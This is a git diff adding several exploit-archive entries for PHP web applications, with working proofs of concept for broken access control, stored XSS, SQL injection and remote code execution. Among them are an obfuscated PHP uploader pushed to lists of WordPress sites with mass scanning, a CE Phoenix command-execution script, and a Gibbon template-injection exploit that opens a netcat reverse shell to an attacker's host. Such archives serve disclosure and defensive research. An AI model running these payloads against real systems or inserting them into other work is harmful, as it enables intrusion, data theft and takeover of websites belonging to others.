diff --git a/exploits/php/webapps/51954.md b/exploits/php/webapps/51954.md
new file mode 100644
index 000000000..fa1675415
--- /dev/null
+++ b/exploits/php/webapps/51954.md
@@ -0,0 +1,103 @@
+# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control
+# Date: 2 Feb 2024
+# Exploit Author: Yevhenii Butenko
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2024-24496
+
+### Broken Access Control:
+
+> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.
+
+### Affected Components:
+
+> home.php, add-tracker.php, delete-tracker.php, update-tracker.php
+
+### Description:
+
+> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.
+
+## Proof of Concept:
+
+### Unauthenticated Access to Home page
+
+> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.
+
+### Create Tracker as Unauthenticated User
+
+To create a tracker, use the following request:
+
+```
+POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 108
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/habit-tracker/home.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
+```
+
+### Update Tracker as Unauthenticated User
+
+To update a tracker, use the following request:
+
+```
+POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 121
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/habit-tracker/home.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes
+```
+
+### Delete Tracker as Unauthenticated User:
+
+To delete a tracker, use the following request:
+
+```
+GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+DNT: 1
+Connection: close
+Referer: http://localhost/habit-tracker/home.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+```
+
+## Recommendations
+
+When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.
\ No newline at end of file
diff --git a/exploits/php/webapps/51955.txt b/exploits/php/webapps/51955.txt
new file mode 100644
index 000000000..d8bd39df4
--- /dev/null
+++ b/exploits/php/webapps/51955.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)
+# Date: 2023-11-14
+# Exploit Author: Ersin Erenler
+# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
+# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
+# Version: 1.0
+# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
+# CVE : CVE-2023-46020
+
+-------------------------------------------------------------------------------
+
+# Description:
+
+The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.
+
+Vulnerable File: updateprofile.php
+
+Parameters: rename, remail, rphone, rcity
+
+# Proof of Concept:
+----------------------
+
+1. Intercept the POST request to updateprofile.php via Burp Suite
+2. Inject the payload to the vulnerable parameters
+3. Payload: "><svg/onload=alert(document.domain)>
+4. Example request for rname parameter:
+
+---
+
+POST /bloodbank/file/updateprofile.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 103
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/bloodbank/rprofile.php?id=1
+Cookie: PHPSESSID=<some-cookie-value>
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
+
+----
+
+5. Go to the profile page and trigger the XSS
+
+XSS Payload:
+
+"><svg/onload=alert(document.domain)>
\ No newline at end of file
diff --git a/exploits/php/webapps/51956.py b/exploits/php/webapps/51956.py
new file mode 100755
index 000000000..cce4be618
--- /dev/null
+++ b/exploits/php/webapps/51956.py
@@ -0,0 +1,47 @@
+#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi
+#References
+#CVE : CVE-2023-0329
+#E1.Coders
+ 
+#Open Burp Suite.
+#In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.
+#Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.
+#Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.
+#On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL":
+ 
+#code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#
+#Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.
+#Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".
+#The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.
+#Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s
+# 
+#References :  https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/
+ 
+ 
+ 
+ 
+#Exploit Python  :
+#The provided SQLi attack vector can be achieved using the following Python code with the "requests" library:
+ 
+#This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.
+#Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct
+ 
+import requests
+ 
+# Set the target URL and SQLi payload
+url = "http://localhost:8080/wp-admin/admin-ajax.php"
+data = {
+    "action": "elementor_ajax_save_builder",
+    "editor_post_id": "1",
+    "post_id": "1",
+    "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"
+}
+ 
+# Send the request to the target URL
+response = requests.post(url, data=data)
+ 
+# Check if the response indicates a successful SQL injection
+if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:
+    print("SQL Injection successful!")
+else:
+    print("SQL Injection failed.")
\ No newline at end of file
diff --git a/exploits/php/webapps/51957.py b/exploits/php/webapps/51957.py
new file mode 100755
index 000000000..690efcb16
--- /dev/null
+++ b/exploits/php/webapps/51957.py
@@ -0,0 +1,138 @@
+## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
+#### Date: 2023-11-25
+#### Exploit Author: tmrswrr
+#### Category: Webapps
+#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
+#### Version: v1.0.8.20
+#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)
+
+## EXPLOIT :
+
+import requests
+from bs4 import BeautifulSoup
+import sys
+import urllib.parse
+import random
+from time import sleep
+
+class colors:
+    OKBLUE = '\033[94m'
+    WARNING = '\033[93m'
+    FAIL = '\033[91m'
+    ENDC = '\033[0m'
+    BOLD = '\033[1m'
+    UNDERLINE = '\033[4m'
+    CBLACK = '\33[30m'
+    CRED = '\33[31m'
+    CGREEN = '\33[32m'
+    CYELLOW = '\33[33m'
+    CBLUE = '\33[34m'
+    CVIOLET = '\33[35m'
+    CBEIGE = '\33[36m'
+    CWHITE = '\33[37m'
+
+
+def entry_banner():
+    color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
+                    colors.CRED, colors.CBEIGE]
+    random.shuffle(color_random)
+
+    banner = color_random[0] + """
+     CE Phoenix v1.0.8.20 - Remote Code Execution \n
+     Author: tmrswrr
+    """
+    for char in banner:
+        print(char, end='')
+        sys.stdout.flush()
+        sleep(0.0045)
+
+def get_formid_and_cookies(session, url):
+    response = session.get(url, allow_redirects=True)
+    if response.ok:
+        soup = BeautifulSoup(response.text, 'html.parser')
+        formid_input = soup.find('input', {'name': 'formid'})
+        if formid_input:
+            return formid_input['value'], session.cookies
+    return None, None
+
+def perform_exploit(session, url, username, password, command):
+    print("\n[+] Attempting to exploit the target...")
+
+
+    initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
+    formid, cookies = get_formid_and_cookies(session, initial_url)
+    if not formid:
+        print("[-] Failed to retrieve initial formid.")
+        return
+
+    # Login
+    print("[+] Performing login...")
+    login_payload = {
+        'formid': formid,
+        'username': username,
+        'password': password
+    }
+    login_headers = {
+        'Content-Type': 'application/x-www-form-urlencoded',
+        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
+        'Referer': initial_url
+    }
+    login_url = url + "/admin/login.php?action=process"
+    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)
+
+    if not login_response.ok:
+        print("[-] Login failed.")
+        print(login_response.text)
+        return
+
+    print("[+] Login successful.")
+
+
+    new_formid, _ = get_formid_and_cookies(session, login_response.url)
+    if not new_formid:
+        print("[-] Failed to retrieve new formid after login.")
+        return
+
+    # Exploit
+    print("[+] Executing the exploit...")
+    encoded_command = urllib.parse.quote_plus(command)
+    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
+    exploit_headers = {
+        'Content-Type': 'application/x-www-form-urlencoded',
+        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
+        'Referer': login_response.url
+    }
+    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
+    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)
+
+    if exploit_response.ok:
+        print("[+] Exploit executed successfully.")
+    else:
+        print("[-] Exploit failed.")
+        print(exploit_response.text)
+
+
+    final_response = session.get(url)
+    print("\n[+] Executed Command Output:\n")
+    print(final_response.text)
+
+def main(base_url, username, password, command):
+    print("\n[+] Starting the exploitation process...")
+    session = requests.Session()
+    perform_exploit(session, base_url, username, password, command)
+
+if __name__ == "__main__":
+    entry_banner()
+
+    if len(sys.argv) < 5:
+        print("Usage: python script.py [URL] [username] [password] [command]")
+        sys.exit(1)
+
+    base_url = sys.argv[1]
+    username = sys.argv[2]
+    password = sys.argv[3]
+    command = sys.argv[4]
+
+    main(base_url, username, password, command)
\ No newline at end of file
diff --git a/exploits/php/webapps/51958.txt b/exploits/php/webapps/51958.txt
new file mode 100644
index 000000000..cad40c2ed
--- /dev/null
+++ b/exploits/php/webapps/51958.txt
@@ -0,0 +1,112 @@
+# Exploit Title: Smart School 6.4.1 - SQL Injection
+# Exploit Author: CraCkEr
+# Date: 28/09/2023
+# Vendor: QDocs - qdocs.net
+# Vendor Homepage: https://smart-school.in/
+# Software Link: https://demo.smart-school.in/
+# Tested on: Windows 10 Pro
+# Impact: Database Access
+# CVE: CVE-2023-5495
+# CWE: CWE-89 - CWE-74 - CWE-707
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+SQL injection attacks can allow unauthorized access to sensitive data, modification of
+data and crash the application or make it unavailable, leading to lost revenue and
+damage to a company's reputation.
+
+
+Path: /course/filterRecords/
+
+POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
+POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
+POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
+
+searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]
+
+-------------------------------------------
+POST /course/filterRecords/ HTTP/1.1
+
+
+searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3
+
+-------------------------------------------
+
+searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
+
+
+Path: /course/filterRecords/
+
+
+POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
+POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
+POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
+POST Parameter 'searchdata[1][title]' is vulnerable to SQLi
+POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi
+POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi
+
+---
+Parameter: searchdata[0][title] (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
+
+Parameter: searchdata[0][searchfield] (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
+
+Parameter: searchdata[0][searchvalue] (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
+
+Parameter: searchdata[1][title] (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
+
+Parameter: searchdata[1][searchvalue] (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z
+---
+
+
+-------------------------------------------
+POST /course/filterRecords/ HTTP/1.1
+
+
+searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
+-------------------------------------------
+
+
+
+Path: /online_admission
+
+---
+Parameter: MULTIPART email ((custom) POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--
+---
+
+POST Parameter 'email' is vulnerable to SQLi
+
+POST /online_admission HTTP/1.1
+
+-----------------------------320375734131102816923531485385
+Content-Disposition: form-data; name="email"
+
+*[SQLi]
+-----------------------------320375734131102816923531485385
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51959.txt b/exploits/php/webapps/51959.txt
new file mode 100644
index 000000000..685097c93
--- /dev/null
+++ b/exploits/php/webapps/51959.txt
@@ -0,0 +1,69 @@
+# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
+# Date: 2024-02-25
+# Author: Milad Karimi (Ex3ptionaL)
+# Category : webapps
+# Tested on: windows 10 , firefox
+
+import sys , requests, re , json
+from multiprocessing.dummy import Pool
+from colorama import Fore
+from colorama import init
+init(autoreset=True)
+
+headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
+'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
+Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
+Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
+'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
+'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
+'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}
+
+uploader = """
+GIF89a
+<?php ?>
+<!DOCTYPE html>
+<html>
+<head>
+  <title>Resultz</title>
+</head>
+<body><h1>Uploader</h1>
+  <form enctype='multipart/form-data' action='' method='POST'>
+    <p>Uploaded</p>
+    <input type='file' name='uploaded_file'></input><br />
+    <input type='submit' value='Upload'></input>
+  </form>
+</body>
+</html>
+<?PHP
+if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo
+base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo
+base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>
+"""
+requests.urllib3.disable_warnings()
+
+def Exploit(Domain):
+    try:
+        if 'http' in Domain:
+          Domain = Domain
+        else:
+          Domain = 'http://'+Domain
+        myup = {'': ('db.php', uploader)}
+        req = requests.post(Domain +
+'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
+files=myup, headers=headers,verify=False, timeout=10).text
+        req1 = requests.get(Domain +
+'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
+        if 'Ex3ptionaL' in req1:
+          print (fg+'[+] '+ Domain + ' --> Shell Uploaded')
+          open('Shellz.txt', 'a').write(Domain +
+'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')
+        else:
+          print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')
+    except:
+        print(fr+' -| ' + Domain + ' --> {} [Failed]')
+
+target = open(input(fm+"Site List: "), "r").read().splitlines()
+mp = Pool(int(input(fm+"Threads: ")))
+mp.map(Exploit, target)
+mp.close()
+mp.join()
\ No newline at end of file
diff --git a/exploits/php/webapps/51962.txt b/exploits/php/webapps/51962.txt
new file mode 100644
index 000000000..735d669cb
--- /dev/null
+++ b/exploits/php/webapps/51962.txt
@@ -0,0 +1,81 @@
+# Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability
+# Date: 21.01.2024
+# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)
+# Vendor Homepage: https://gibbonedu.org/
+# Software Link: https://github.com/GibbonEdu/core
+# Version: v26.0.00
+# Tested on: Ubuntu 22.0
+# CVE : CVE-2024-24724
+
+import requests
+import re
+import sys
+
+
+def login(target_host, target_port,email,password):
+     url = f'http://{target_host}:{target_port}/login.php?timeout=true'
+     headers = {"Content-Type": "multipart/form-data;
+boundary=---------------------------174475955731268836341556039466"}
+     data =
+f"-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
+     r = requests.post(url, headers=headers, data=data,
+allow_redirects=False)
+     Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])
+     if Session_Cookie[4] is not None and '/index.php' in
+str(r.headers['Location']):
+         print("login successful!")
+
+     return Session_Cookie[4]
+
+
+
+def rce(cookie, target_host, target_port, attacker_ip, attacker_port):
+     url =
+f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'
+     headers = {"Content-Type": "multipart/form-data;
+boundary=---------------------------67142646631840027692410521651",
+"Cookie": cookie}
+     data =
+f"-----------------------------67142646631840027692410521651\r\nContent-Disposition:
+form-data; name=\"address\"\r\n\r\n/modules/School
+Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:
+form-data;
+name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:
+form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo
+/tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port}
+ >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"
+     r = requests.post(url, headers=headers, data=data,
+allow_redirects=False)
+     if 'success0' in str(r.headers['Location']):
+         print("Payload uploaded successfully!")
+
+
+
+def trigger(cookie, target_host, target_port):
+     url =
+f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'
+     headers = {"Cookie": cookie}
+     print("RCE successful!")
+     r = requests.get(url, headers=headers, allow_redirects=False)
+
+
+if __name__ == '__main__':
+     if len(sys.argv) != 7:
+         print("Usage: script.py <target_host> <target_port>
+<attacker_ip> <attacker_port> <email> <password>")
+         sys.exit(1)
+     cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])
+     rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
+     trigger(cookie, sys.argv[1], sys.argv[2])
\ No newline at end of file
diff --git a/exploits/php/webapps/51963.txt b/exploits/php/webapps/51963.txt
new file mode 100644
index 000000000..ee7337e78
--- /dev/null
+++ b/exploits/php/webapps/51963.txt
@@ -0,0 +1,65 @@
+# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting
+# Date: 2023-09-25
+# Exploit Author: Vinnie McRae - RedTeamer IT Security
+# Vendor Homepage: https://www.axigen.com/
+# Software Link: https://www.axigen.com/mail-server/download/
+# Version: (10.5.7) and older version of Axigen WebMail
+# Tested on: firefox, chrome
+# CVE: CVE-2023-48974
+
+Description
+
+The `serverName_input` parameter is vulnerable to stored cross-site
+scripting (XSS) due to unsanitized or unfiltered processing. This means
+that an attacker can inject malicious code into this parameter, which will
+then be executed by other users when they view the page where the parameter
+is used. This is affecting authenticated administrators, and the attack can
+be used to attack other administrators with more permissions.
+
+Exploitation
+
+1. Login as administrator
+2. Navigate to "global settings"
+3. Change server name to <script>alert(1)</script>
+
+PoC of the POST request:
+
+```
+POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1
+Host: localhost:9443
+Cookie: eula=true;
+WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D;
+webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true;
+public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52;
+menuLeftTopPosition=-754
+Content-Type: multipart/form-data;
+boundary=---------------------------41639384187581032291088896642
+Content-Length: 12401
+Connection: close
+
+-----------------------------41639384187581032291088896642
+Content-Disposition: form-data; name="serverName_input"
+
+<script>alert(1)</script>
+-----------------------------41639384187581032291088896642
+Content-Disposition: form-data; name="primary_domain_input"
+
+axigen
+-----------------------------41639384187581032291088896642
+Content-Disposition: form-data; name="ssl_random_file_input"
+
+--SNIP--
+
+-----------------------------41639384187581032291088896642
+Content-Disposition: form-data; name="update"
+
+Save Configuration
+-----------------------------41639384187581032291088896642--
+```
+
+
+
+#______________________________
+#Vinnie McRae
+#RedTeamer IT Security
+#Blog: redteamer.de/blog-beitrag/
\ No newline at end of file
diff --git a/exploits/windows/local/51939.txt b/exploits/windows/local/51939.txt
new file mode 100644
index 000000000..0dca57154
